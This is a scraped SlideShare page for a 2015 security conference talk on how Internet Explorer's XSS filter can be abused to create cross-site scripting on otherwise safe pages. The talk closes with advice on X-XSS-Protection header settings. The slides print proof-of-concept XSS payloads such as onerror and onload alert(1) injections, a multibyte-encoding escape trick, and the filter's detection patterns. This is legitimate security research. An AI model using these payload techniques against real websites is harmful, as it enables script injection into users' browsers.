Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
X-XSS-Nightmare: 1; mode=attack
XSS Attacks Exploiting XSS
Filter
(Prudence Edition)
Masato Kinugawa
Self-Introduction
Masato Kinugawa
Self-Introduction
Masato Kinugawa
x
s
Self-Introduction
Masato Kinugawa
x
s
B
Bug-hunter's Joy
Self-Introduction
Today's topics
❶XSS technique
❷Bypass XSS filter technique
Using IE’s XSS filter
Today's topics
❶XSS technique
❷Bypass XSS filter technique
Using IE’s XSS filter
Sorry! I Changed today's topics!
Today's topics
What is XSS filter?
How to associate with XSS filter?
XSS Filter
Chrome and Safari have the same function.
➡This time, I pick up IE's filter.
It was introduced from IE8.(2009)
Basic of XSS filter of IE
http://example.com/?q=<img+src=x+onerror=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="...
Like this #
http://example.com/?q=<img+src=x+onerror=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head...
Inaccuracy of XSS Filter
If matched with the condition, XSS filter
rewrites a string unrelated to part of a
dynamic creati...
World of after introduction
of XSS filter
All site suddenly had the possibility of
partial rewrite of a page.
#
#
#
2008 2...
About little change
Is it no big deal?
➡Let’s think about changing
1 byte at somewhere!
#
#
#
http://example.com/?q=AAA
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<script>...
http://example.com/?q="/</script
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</titl...
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</ti#l...
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</ti#l...
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</ti#l...
http://example.com/?q=</title><svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</ti#l...
http://example.com/?q=%E3%81%95";alert(1)//
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=%E3%81%95";alert(1)//
<!DOCTYPE html>
<html>
<head>
<m#ta charset="utf-8">
<title>TEST</title>
</hea...
Interpretation of UTF-8
"さ";alert(1)//"
0xE3 0x81 0x95 0x5C
UTF-8 さ 
Shift_JIS 縺 表
"縺表";alert(1)//"
Interpretation of Shift_JIS
0xE3 0x81 0x95 0x5C
UTF-8 さ 
Shift_JIS 縺 表
http://example.com/?q=%E3%81%95";alert(1)//
<!DOCTYPE html>
<html>
<head>
<m#ta charset="utf-8">
<title>TEST</title>
</hea...
http://example.com/?q=%E3%81%95";alert(1)//
<!DOCTYPE html>
<html>
<head>
<m#ta charset="utf-8">
<title>TEST</title>
</hea...
Basically,
Even 1 byte of change is risk.
In the past,
If you don't do careful, Rewrite of
XSS filter also becomes vulnera...
2015: Is it safe at now?
Let’s see
how much real cut-off rule is!
I found XSS vulnerable patterns page
of normal structure...
Cut-off Rule
It isn't documented in particular.
We can see the loading binary to browser of dll
include regular expression...
<button value=
<form>
<textarea>
<isindex>
<input value=
<option value=
<embed src=
<embed type=
<iframe src=
<frame src=
...
<button value=
<form>
<textarea>
<isindex>
<input value=
<option value=
<embed src=
<embed type=
<iframe src=
<frame src=
...
<button value=
<form>
<textarea>
<isindex>
<input value=
<option value=
<embed src=
<embed type=
<iframe src=
<frame src=
...
<button va#ue=
<fo#m>
<texta#ea>
<is#ndex>
<input va#ue=
<option va#ue=
<em#ed src=
<em#ed type=
<if#ame src=
<f#ame src=
...
<button va#ue=
<fo#m>
<texta#ea>
<is#ndex>
<input va#ue=
<option va#ue=
<em#ed src=
<em#ed type=
<if#ame src=
<f#ame src=
...
http://example.com/?q=<svg/onload=alert(1)>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</hea...
<a hr#f
<m#ta charset=
<li#k href=
<script>
DEMO❶
❷
❸
❹
I want you to feel it
Safety of your site is depend on XSS filter.
➡Is it browser's bug?
Should browser do something about...
From the first, your page is
Can you declare your site that can
stand up to partial breakdown?
XSS filter can do this
XSS filter very carefully rewrites a page.
#
In fact
In some case, it is possible to
not operate specific function
from intentional false positive.
(…)
Did the author ...
In fact
http://b.hatena.ne.jp/entry/14131603/comment/hasegawayosuke
Insider said
"The answer is Yes. ".
Mr. Hasegawa
Brows...
What is
"taking care of the risk"?
✔ you should completely grasp XSS filter's cut-
off action.
✔ If the part of the page i...
Example of cut-off string
javascript:1
vbscript:1
vbs:1
Example of cut-off string
javasc#ipt:1
v#script:1
v#s:1
Is this simple?
Detail of cut-off of javascript:
{(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0
*(9|(13)|(10)|A|D);?)|(t...
Detail of cut-off of javascript:
{(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0
*(9|(13)|(10)|A|D);?)|(t...
If you can do those,
✔ you should completely grasp XSS filter's cut-
off action.
✔ If the part of the page is rewritten, y...
X-XSS-Protection:
Value Effect
0 Disable
1
Enable
(Partial rewrite)
1;mode=block
Enable
(Prevent rendering of the page)
De...
How are
careful persons doing?
HTTP/2.0 200 OK
Date: Mon, 19 Oct 2015 22:32:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Server: ...
HTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 19 Oct 2015 22:40:37 GMT
x-content-type-options:...
They are calculatingly
controlling!!
The choice which
considered more safety
Value Sites which should choose header
0
They are measuring basic XSS.
/They want ...
Is mode=block safe?
It should don't affect direct script execution.
I think a favor of the filter is bigger than it.
If fe...
Comments for Web
developer
Me
How about changing to
1;mode=block?
Comments for Web
developer
How about changing to
1;mode=block?
Cut-off explanation is unkind,
It is difficult when user su...
Cut-off explanation is
unkind.
Sure…
I think this site is measuring basic XSS,
Would you like to use X-XSS-Protection:0?
Me
Comments for Web
developer
I think this site is measuring basic XSS,
Would you like to use X-XSS-Protection:0?
Me
User may think about setting of
inf...
Trap of XSS filter
XSS filter cut off only attacked position then it
shows other position, it seems like the smartest.
0 1...
Conclusions
I'm hoping for improvement of XSS filter.
It should still be possible to do safely.
Is present default action ...
http://l0.cm/xxn/
Real Nightmare will be
published on this URL.
lower-case of L and Zero
";alert#"Thanks!"#//
@kinugawamasato
masatokinugawa@gmail#com
Upcoming SlideShare
Loading in …5
×

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015

3,099 views

Published on

Microsoft's web browsers, Internet Explorer and Edge, have a feature called 'XSS filter' built in which protects users from XSS attacks. In order to deny XSS attacks, XSS filter looks into the request for a string resembling an XSS attack, compares it with the page and finds the appearance of it, and rewrites parts of the string if it appears in the page. This rewriting process of the string - is this done safely? The answer is no. This time, I have found a way to exploit XSS filter not to protect a web page, but to create an XSS vulnerability on a web page that is completely sane and free of XSS vulnerability. In this talk, I will describe technical details about possibilities of XSS attacks exploiting XSS filter and propose what website administrators should do to face this XSS filter nightmare.

Published in: Software
  • Be the first to comment

XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015

  1. 1. X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter (Prudence Edition) Masato Kinugawa
  2. 2. Self-Introduction Masato Kinugawa
  3. 3. Self-Introduction Masato Kinugawa x s
  4. 4. Self-Introduction Masato Kinugawa x s B
  5. 5. Bug-hunter's Joy Self-Introduction
  6. 6. Today's topics ❶XSS technique ❷Bypass XSS filter technique Using IE’s XSS filter
  7. 7. Today's topics ❶XSS technique ❷Bypass XSS filter technique Using IE’s XSS filter Sorry! I Changed today's topics!
  8. 8. Today's topics What is XSS filter? How to associate with XSS filter?
  9. 9. XSS Filter Chrome and Safari have the same function. ➡This time, I pick up IE's filter. It was introduced from IE8.(2009)
  10. 10. Basic of XSS filter of IE http://example.com/?q=<img+src=x+onerror=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> </head> <body> q param is: <img src=x onerror=alert(1)> </body> </html> Before cut-off If request and response are matched with dangerous condition, XSS filter rewrites a page.
  11. 11. Like this # http://example.com/?q=<img+src=x+onerror=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> </head> <body> q param is: <img src=x #nerror=alert(1)> </body> </html> If request and response are matched with dangerous condition, XSS filter rewrites a page. After cut-off
  12. 12. Inaccuracy of XSS Filter If matched with the condition, XSS filter rewrites a string unrelated to part of a dynamic creation of user input. http://example.com/?q=AAA&<meta+charset= <!DOCTYPE html> <html> <head> <m#ta charset="utf-8"> </head> <body> q param is: AAA </body> </html>
  13. 13. World of after introduction of XSS filter All site suddenly had the possibility of partial rewrite of a page. # # # 2008 2009
  14. 14. About little change Is it no big deal? ➡Let’s think about changing 1 byte at somewhere! # # #
  15. 15. http://example.com/?q=AAA <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="AAA".replace(/</g,'&lt;'); document.write(s); </script> </body> </html> Dynamic creation of User's input to inside of string literal
  16. 16. http://example.com/?q="/</script <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s=""/</script".replace(/</g,'&lt;'); document.write(s); </script> </body> </html> XSS measures is OK
  17. 17. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  18. 18. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  19. 19. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  20. 20. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  21. 21. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  22. 22. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  23. 23. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  24. 24. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  25. 25. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html> &lt;svg/onload=alert(1)>
  26. 26. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <scr#pt> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  27. 27. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <scr#pt> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  28. 28. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <scr#pt> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  29. 29. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'&lt;'); document.write(s); </script> </body> </html>
  30. 30. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'&lt;'); document.write(s); </script> </body> </html>
  31. 31. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'&lt;'); document.write(s); </script> </body> </html>
  32. 32. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'&lt;'); document.write(s); </script> </body> </html>
  33. 33. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'&lt;'); document.write(s); </script> </body> </html>
  34. 34. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'&lt;'); document.write(s); </script> </body> </html>
  35. 35. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'&lt;'); document.write(s); </script> </body> </html> <svg/onload=alert(1)>
  36. 36. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="<svg/onload=alert(1)>".replace(/#/g,'&lt;'); document.write(s); </script> </body> </html> <svg/onload=alert(1)>
  37. 37. http://example.com/?q=</title><svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="</title><svg/onload=alert(1)>".replace(/</g,'&l t;'); document.write(s); </script> </body> </html>
  38. 38. http://example.com/?q=</title><svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</ti#le> </head> <body> <script> s="</title><svg/onload=alert(1)>".replace(/</g,'&l t;'); document.write(s); </script> </body> </html>
  39. 39. http://example.com/?q=</title><svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</ti#le> </head> <body> <script> s="</title><svg/onload=alert(1)>".replace(/</g,'&l t;'); document.write(s); </script> </body> </html>
  40. 40. http://example.com/?q=</title><svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</ti#le> </head> <body> <script> s="</title><svg/onload=alert(1)>".replace(/</g,'&l t;'); document.write(s); </script> </body> </html>
  41. 41. http://example.com/?q=</title><svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</ti#le> </head> <body> <script> s="</title><svg/onload=alert(1)>".replace(/</g,'&l t;'); document.write(s); </script> </body> </html>
  42. 42. http://example.com/?q=%E3%81%95";alert(1)// <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="さ";alert(1)//".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  43. 43. http://example.com/?q=%E3%81%95";alert(1)// <!DOCTYPE html> <html> <head> <m#ta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="さ";alert(1)//".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  44. 44. Interpretation of UTF-8 "さ";alert(1)//" 0xE3 0x81 0x95 0x5C UTF-8 さ Shift_JIS 縺 表
  45. 45. "縺表";alert(1)//" Interpretation of Shift_JIS 0xE3 0x81 0x95 0x5C UTF-8 さ Shift_JIS 縺 表
  46. 46. http://example.com/?q=%E3%81%95";alert(1)// <!DOCTYPE html> <html> <head> <m#ta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="縺表";alert(1)//".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  47. 47. http://example.com/?q=%E3%81%95";alert(1)// <!DOCTYPE html> <html> <head> <m#ta charset="utf-8"> <title>TEST</title> </head> <body> <script> s="縺表";alert(1)//".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  48. 48. Basically, Even 1 byte of change is risk. In the past, If you don't do careful, Rewrite of XSS filter also becomes vulnerable. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf Universal XSS via IE8s XSS Filters Eduardo Vela Nava & David Lindsay
  49. 49. 2015: Is it safe at now? Let’s see how much real cut-off rule is! I found XSS vulnerable patterns page of normal structure which has no XSS It is safe…no, it doesn't! Apart from it this This case will publish after modify.
  50. 50. Cut-off Rule It isn't documented in particular. We can see the loading binary to browser of dll include regular expression of cut-off strings.
  51. 51. <button value= <form> <textarea> <isindex> <input value= <option value= <embed src= <embed type= <iframe src= <frame src= <x:vmlframe src= <link href= <import implementation= <meta http-equiv= <meta charset= <a href <script src= <script xlink:href= <script href= <script> <applet> <object type= <object codetype= <object classid= <object code= <object data= <base href= <style>@i <style>:( <style>: <style>=( <style>=
  52. 52. <button value= <form> <textarea> <isindex> <input value= <option value= <embed src= <embed type= <iframe src= <frame src= <x:vmlframe src= <link href= <import implementation= <meta http-equiv= <meta charset= <a href <script src= <script xlink:href= <script href= <script> <applet> <object type= <object codetype= <object classid= <object code= <object data= <base href= <style>@i <style>:( <style>: <style>=( <style>=
  53. 53. <button value= <form> <textarea> <isindex> <input value= <option value= <embed src= <embed type= <iframe src= <frame src= <x:vmlframe src= <link href= <import implementation= <meta http-equiv= <meta charset= <a href <script src= <script xlink:href= <script href= <script> <applet> <object type= <object codetype= <object classid= <object code= <object data= <base href= <style>@i <style>:( <style>: <style>=( <style>=
  54. 54. <button va#ue= <fo#m> <texta#ea> <is#ndex> <input va#ue= <option va#ue= <em#ed src= <em#ed type= <if#ame src= <f#ame src= <x:vmlf#ame src= <li#k href= <im#ort implementation= <m#ta http-equiv= <m#ta charset= <a hr#f <script src= <script xlink:href= <script href= <script> <ap#let> <ob#ect type= <ob#ect codetype= <ob#ect classid= <ob#ect code= <ob#ect data= <ba#e href= <style>@i <style>:( <style>: <style>=( <style>= After cut-off
  55. 55. <button va#ue= <fo#m> <texta#ea> <is#ndex> <input va#ue= <option va#ue= <em#ed src= <em#ed type= <if#ame src= <f#ame src= <x:vmlf#ame src= <li#k href= <im#ort implementation= <m#ta http-equiv= <m#ta charset= <a hr#f <script src= <script xlink:href= <script href= <script> <ap#let> <ob#ect type= <ob#ect codetype= <ob#ect classid= <ob#ect code= <ob#ect data= <ba#e href= <style>@i <style>:( <style>: <style>=( <style>= After cut-off
  56. 56. http://example.com/?q=<svg/onload=alert(1)> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>TEST</title> </head> <body> <scr#pt> s="<svg/onload=alert(1)>".replace(/</g,'&lt;'); document.write(s); </script> </body> </html>
  57. 57. <a hr#f <m#ta charset= <li#k href= <script> DEMO❶ ❷ ❸ ❹
  58. 58. I want you to feel it Safety of your site is depend on XSS filter. ➡Is it browser's bug? Should browser do something about it? I can not say rewrite of page is always safe.
  59. 59. From the first, your page is Can you declare your site that can stand up to partial breakdown?
  60. 60. XSS filter can do this XSS filter very carefully rewrites a page. #
  61. 61. In fact In some case, it is possible to not operate specific function from intentional false positive. (…) Did the author of XSS filter introduce XSS filter while recognizing about the risks? (or not) I’m interested a little about it. Mr. Terada's blog http://d.hatena.ne.jp/teracc/2 0090622 Browser side introduced it, knowing the risk. Mr. Terada and Mr. Hasegawa's log at 6 years ago is as follows:
  62. 62. In fact http://b.hatena.ne.jp/entry/14131603/comment/hasegawayosuke Insider said "The answer is Yes. ". Mr. Hasegawa Browser side introduced it, knowing the risk. Mr. Terada and Mr. Hasegawa's log at 6 years ago is as follows: ➡Does Web developer use it while taking care of the risk?
  63. 63. What is "taking care of the risk"? ✔ you should completely grasp XSS filter's cut- off action. ✔ If the part of the page is rewritten, you should inspect all page for normal operation and safety. ✔ If the page includes dangerous part, you should rewrite the code one by one for avoidance. Then, you should do as follows: Can you do those?
  64. 64. Example of cut-off string javascript:1 vbscript:1 vbs:1
  65. 65. Example of cut-off string javasc#ipt:1 v#script:1 v#s:1 Is this simple?
  66. 66. Detail of cut-off of javascript: {(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0 *(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|( 41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;) |(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&( ([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[ ].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73) );?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))) )*(c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0 *(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|( 52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab; )|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69));?))([t]|(& (([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[ ].]x?0*((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10 )|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((84)|(54)|(116)|(7 4));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;) )))*(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).}
  67. 67. Detail of cut-off of javascript: {(j|(&[#()[].]x?0*((74)|(4A)|(106)|(6A));?))([t]|(&(([#()[].]x?0 *(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[].]x?0*((65)|( 41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;) |(newline;))))*(v|(&[#()[].]x?0*((86)|(56)|(118)|(76));?))([t]|(&( ([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(a|(&[#()[ ].]x?0*((65)|(41)|(97)|(61));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(s|(&[#()[].]x?0*((83)|(53)|(115)|(73) );?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))) )*(c|(&[#()[].]x?0*((67)|(43)|(99)|(63));?))([t]|(&(([#()[].]x?0 *(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&[#()[].]x?0*((82)|( 52)|(114)|(72));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab; )|(newline;))))*(i|(&[#()[].]x?0*((73)|(49)|(105)|(69));?))([t]|(& (([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&[#()[ ].]x?0*((80)|(50)|(112)|(70));?))([t]|(&(([#()[].]x?0*(9|(13)|(10 )|A|D);?)|(tab;)|(newline;))))*(t|(&[#()[].]x?0*((84)|(54)|(116)|(7 4));?))([t]|(&(([#()[].]x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;) )))*(:|(&(([#()[].]x?0*((58)|(3A));?)|(colon;)))).} http://masatokinugawa.l0.cm/2012/09/xss3.html
  68. 68. If you can do those, ✔ you should completely grasp XSS filter's cut- off action. ✔ If the part of the page is rewritten, you should inspect all page for normal operation and safety. ✔ If the page includes dangerous part, you should rewrite the code one by one for avoidance. I think you can modify all XSS on your site... ➡What is the best?
  69. 69. X-XSS-Protection: Value Effect 0 Disable 1 Enable (Partial rewrite) 1;mode=block Enable (Prevent rendering of the page) Default The response header that can control XSS filter.
  70. 70. How are careful persons doing?
  71. 71. HTTP/2.0 200 OK Date: Mon, 19 Oct 2015 22:32:06 GMT Content-Type: text/html; charset=UTF-8 Content-Encoding: gzip Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN ...
  72. 72. HTTP/1.1 200 OK Content-Encoding: gzip Content-Type: text/html Date: Mon, 19 Oct 2015 22:40:37 GMT x-content-type-options: nosniff X-Frame-Options: DENY X-XSS-Protection: 0 ...
  73. 73. They are calculatingly controlling!!
  74. 74. The choice which considered more safety Value Sites which should choose header 0 They are measuring basic XSS. /They want to remove false-negative. 1 Not recommended (Discovered technique affects here.) 1;mode =block It is probable that the site have XSS. /They want to protect site just in case. default X-XSS-Protection:0 or 1;mode=block
  75. 75. Is mode=block safe? It should don't affect direct script execution. I think a favor of the filter is bigger than it. If feature of cut-off can detect from outside, they may guess page contents. This possibility probably can't be changes to zero. On the other hand…
  76. 76. Comments for Web developer Me How about changing to 1;mode=block?
  77. 77. Comments for Web developer How about changing to 1;mode=block? Cut-off explanation is unkind, It is difficult when user support of false-negative… Dev Me
  78. 78. Cut-off explanation is unkind. Sure…
  79. 79. I think this site is measuring basic XSS, Would you like to use X-XSS-Protection:0? Me Comments for Web developer
  80. 80. I think this site is measuring basic XSS, Would you like to use X-XSS-Protection:0? Me User may think about setting of infelicity security function with highly priority of product action. Dev Comments for Web developer
  81. 81. Trap of XSS filter XSS filter cut off only attacked position then it shows other position, it seems like the smartest. 0 1 block This action is the risk.
  82. 82. Conclusions I'm hoping for improvement of XSS filter. It should still be possible to do safely. Is present default action really OK? In theory, cut-off risk is inseparable from XSS filter. I want web developer to know this possibility. I highly recommend XSS protection control except default action.
  83. 83. http://l0.cm/xxn/ Real Nightmare will be published on this URL. lower-case of L and Zero
  84. 84. ";alert#"Thanks!"#// @kinugawamasato masatokinugawa@gmail#com

×